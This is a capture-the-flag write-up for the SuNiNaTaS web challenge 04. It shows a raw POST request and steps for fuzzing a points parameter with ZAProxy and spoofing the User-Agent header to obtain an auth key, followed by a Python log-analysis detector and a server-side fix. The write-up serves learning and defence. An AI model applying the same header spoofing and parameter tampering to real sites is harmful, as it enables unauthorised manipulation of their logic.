Game 04
Hint: Make your point to 50 & ‘SuNiNaTaS’
Tool: ZAProxy
Initial Request
```http
POST http://suninatas.com/challenge/web04/web04_ck.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web04/web04.asp
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ
Upgrade-Insecure-Requests: 1
Priority: u=0, i

total=0
```
Solution Steps
- Set fuzz location with numbers from 0 → 23
- Click plus in browser with the same cookie
- Receive alert: “I like the SuNiNaTaS browser!”
- Change User-Agent to include “SuNiNaTaS”:
```http
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 SuNiNaTaS/147.0
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ

total=25
```
- Fuzz again until points reach 50 (avoid overflow)
Response
```html
<td class="table_top">
<font size="2"><b>Auth key</b></font>
</td>
<td class="table_top">***********************</td>
```
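Seen from the server side, the steps above leave a recognisable trace: one session cookie sending repeated POSTs to the same endpoint while its User-Agent changes partway through. The following is an added example, not part of the original writeup, that flags that pattern in a W3C-style access log. The IIS log format, the field list, the `min_posts` threshold, the function names and the sample rows are all assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed sample rows; IIS W3C logging (assumed) writes spaces as '+'.
FF = "Mozilla/5.0+(X11;+Linux+x86_64;+rv:147.0)+Gecko/20100101+Firefox/147.0"
SN = FF.replace("Firefox", "SuNiNaTaS")
FIELDS = "#Fields: date time cs-method cs-uri-stem c-ip cs(User-Agent) cs(Cookie) sc-status"

def _row(sec, ua, cookie):
    return f"2024-01-01 10:00:{sec:02d} POST /challenge/web04/web04_ck.asp 10.0.0.5 {ua} {cookie} 200"

SAMPLE_LOG = "\n".join(
    [FIELDS]
    + [_row(s, FF, "ASPSESSIONIDEXAMPLE=AAAA") for s in range(3)]      # before UA change
    + [_row(s, SN, "ASPSESSIONIDEXAMPLE=AAAA") for s in range(3, 6)]   # same session, new UA
    + [_row(s, FF, "ASPSESSIONIDEXAMPLE=BBBB") for s in range(6, 8)]   # ordinary visitor
)

def parse_w3c(text):
    """Yield one dict per request, using the column order from '#Fields:'."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):   # skip truncated or malformed rows
                yield dict(zip(fields, values))

def suspicious_sessions(text, min_posts=5):
    """Sessions with >= min_posts POSTs to one URI and more than one User-Agent."""
    posts = defaultdict(int)     # (cookie, uri) -> POST count
    agents = defaultdict(list)   # cookie -> User-Agents in first-seen order
    for rec in parse_w3c(text):
        cookie = rec.get("cs(Cookie)", "-")
        if cookie == "-":        # IIS logs '-' for an empty field
            continue
        ua = rec.get("cs(User-Agent)", "-")
        if ua not in agents[cookie]:
            agents[cookie].append(ua)
        if rec.get("cs-method") == "POST":
            posts[(cookie, rec.get("cs-uri-stem", "-"))] += 1
    return [
        {"session": c, "uri": u, "posts": n, "user_agents": agents[c]}
        for (c, u), n in sorted(posts.items())
        if n >= min_posts and len(agents[c]) > 1
    ]

if __name__ == "__main__":
    for hit in suspicious_sessions(SAMPLE_LOG):
        print(hit)
```

The check only sees a User-Agent gate being probed; the underlying fix is to keep the counter in server-side session state and not treat a request header as proof of which client is calling.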